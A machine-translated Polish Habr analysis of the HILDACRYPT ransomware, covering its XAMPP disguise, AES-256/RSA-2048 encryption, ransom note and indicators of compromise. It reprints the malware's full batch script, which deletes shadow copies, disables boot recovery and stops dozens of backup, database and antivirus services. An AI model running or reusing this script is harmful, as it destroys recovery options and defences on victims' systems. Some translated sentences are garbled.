Witaj, Habro! Po raz kolejny mówimy o najnowszych wersjach szkodliwego oprogramowania z kategorii Ransomware. HILDACRYPT to nowe oprogramowanie ransomware należące do rodziny Hilda odkryte w sierpniu 2019 r. i nazwane na cześć kreskówki Netflix wykorzystanej do dystrybucji tego oprogramowania. Dzisiaj zapoznajemy się z funkcjami technicznymi tego zaktualizowanego wirusa ransomware.
W pierwszej wersji ransomware Hilda link do tego opublikowanego na Youtube w liście z żądaniem okupu zawarty był serial animowany. HILDACRYPT udaje legalnego instalatora XAMPP, łatwej w instalacji dystrybucji Apache, która zawiera MariaDB, PHP i Perl. Jednocześnie cryptolocker ma inną nazwę pliku - xamp. Ponadto plik ransomware nie posiada podpisu elektronicznego.
Analiza statyczna
Ransomware znajduje się w pliku PE32 .NET napisanym dla MS Windows. Jego rozmiar wynosi 135 168 bajtów. Zarówno główny kod programu, jak i kod programu obrońcy są napisane w języku C#. Zgodnie ze znacznikiem daty i godziny kompilacji plik binarny został utworzony 14 września 2019 r.
Według Detect It Easy ransomware jest archiwizowany przy użyciu Confuser i ConfuserEx, ale te zaciemniacze są takie same jak poprzednio, tylko ConfuserEx jest następcą Confuser, więc ich sygnatury kodów są podobne.
HILDACRYPT rzeczywiście jest dołączony do ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Wektor ataku
Najprawdopodobniej oprogramowanie ransomware zostało wykryte na jednej ze stron internetowych z programami i podszywało się pod legalny program XAMPP.
Cały łańcuch infekcji można zobaczyć w .
Zaciemnienie
Ciągi ransomware są przechowywane w postaci zaszyfrowanej. Po uruchomieniu HILDACRYPT odszyfrowuje je przy użyciu Base64 i AES-256-CBC.
Instalacja
Po pierwsze, ransomware tworzy folder w %AppDataRoaming%, w którym losowo generowany jest parametr GUID (Globally Unique Identifier). Dodając plik bat do tej lokalizacji, wirus ransomware uruchamia go za pomocą cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat i zakończ
Następnie rozpoczyna wykonywanie skryptu wsadowego, aby wyłączyć funkcje lub usługi systemu.
Skrypt zawiera długą listę poleceń niszczących kopie w tle, wyłączających serwer SQL, kopie zapasowe i rozwiązania antywirusowe.
Na przykład bezskutecznie próbuje zatrzymać usługi Acronis Backup. Ponadto atakuje systemy kopii zapasowych i rozwiązania antywirusowe następujących dostawców: Veeam, Sophos, Kaspersky, McAfee i innych.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Po wyłączeniu wyżej wymienionych usług i procesów cryptolocker zbiera informacje o wszystkich uruchomionych procesach za pomocą polecenia tasklist, aby upewnić się, że wszystkie niezbędne usługi nie działają.
lista zadań v/fo csv
Polecenie to wyświetla szczegółową listę uruchomionych procesów, których elementy oddzielone są znakiem „,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Po tej kontroli ransomware rozpoczyna proces szyfrowania.
Szyfrowanie
Szyfrowanie plików
HILDACRYPT przegląda całą znalezioną zawartość dysków twardych, z wyjątkiem folderów Recycle.Bin i Reference AssembliesMicrosoft. Ten ostatni zawiera krytyczne pliki dll, pdb itp. dla aplikacji .Net, które mogą mieć wpływ na działanie ransomware. Do wyszukiwania plików, które zostaną zaszyfrowane, używana jest poniższa lista rozszerzeń:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware wykorzystuje algorytm AES-256-CBC do szyfrowania plików użytkownika. Rozmiar klucza wynosi 256 bitów, a rozmiar wektora inicjującego (IV) to 16 bajtów.
Na poniższym zrzucie ekranu wartości byte_2 i byte_1 zostały uzyskane losowo za pomocą metody GetBytes().
klucz
W I
Zaszyfrowany plik ma rozszerzenie HCY!.. To jest przykład zaszyfrowanego pliku. Dla tego pliku utworzono klucz i IV wspomniane powyżej.
Szyfrowanie klucza
Cryplocker przechowuje wygenerowany klucz AES w zaszyfrowanym pliku. Pierwsza część zaszyfrowanego pliku ma nagłówek zawierający dane takie jak HILDACRYPT, KEY, IV, FileLen w formacie XML i wygląda następująco:
Szyfrowanie kluczem AES i IV odbywa się przy użyciu RSA-2048, a kodowanie odbywa się przy użyciu Base64. Klucz publiczny RSA jest przechowywany w treści kryptolokera w jednym z zaszyfrowanych ciągów znaków w formacie XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Klucz publiczny RSA służy do szyfrowania klucza pliku AES. Klucz publiczny RSA jest zakodowany w formacie Base64 i składa się z modułu i wykładnika publicznego o wartości 65537. Odszyfrowanie wymaga klucza prywatnego RSA, którym dysponuje atakujący.
Po zaszyfrowaniu RSA klucz AES jest kodowany przy użyciu Base64 zapisanego w zaszyfrowanym pliku.
Wiadomość o okupie
Po zakończeniu szyfrowania HILDACRYPT zapisuje plik HTML w folderze, w którym zaszyfrował pliki. Powiadomienie o okupie zawiera dwa adresy e-mail, pod którymi ofiara może skontaktować się z atakującym.
W ogłoszeniu o wyłudzeniu znajduje się także wzmianka „Żadne loli nie jest bezpieczne ;)” – nawiązanie do postaci z anime i mangi o wyglądzie małych dziewczynek zakazanych w Japonii.
Wniosek
HILDACRYPT, nowa rodzina ransomware, wydała nową wersję. Model szyfrowania uniemożliwia ofierze odszyfrowanie plików zaszyfrowanych przez oprogramowanie ransomware. Cryptolocker wykorzystuje metody aktywnej ochrony, aby wyłączyć usługi ochrony związane z systemami kopii zapasowych i rozwiązaniami antywirusowymi. Autor HILDACRYPT jest fanem serialu animowanego Hilda emitowanego na Netfliksie, którego link do zwiastuna znalazł się w liście wykupu poprzedniej wersji programu.
Zwykle и może chronić Twój komputer przed oprogramowaniem ransomware HILDACRYPT, a dostawcy mają możliwość ochrony swoich klientów . Ochronę zapewnia fakt, że rozwiązania te obejmują obejmuje nie tylko kopię zapasową, ale także nasz zintegrowany system bezpieczeństwa - Oparta na modelu uczenia maszynowego i heurystyce behawioralnej, technologii, która jak żadna inna jest w stanie przeciwdziałać zagrożeniu oprogramowaniem ransomware typu zero-day.
Wskaźniki kompromisu
Rozszerzenie pliku HCY!
HILDACRYPTReadMe.html
xamp.exe z jedną literą „p” i bez podpisu cyfrowego
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Źródło: www.habr.com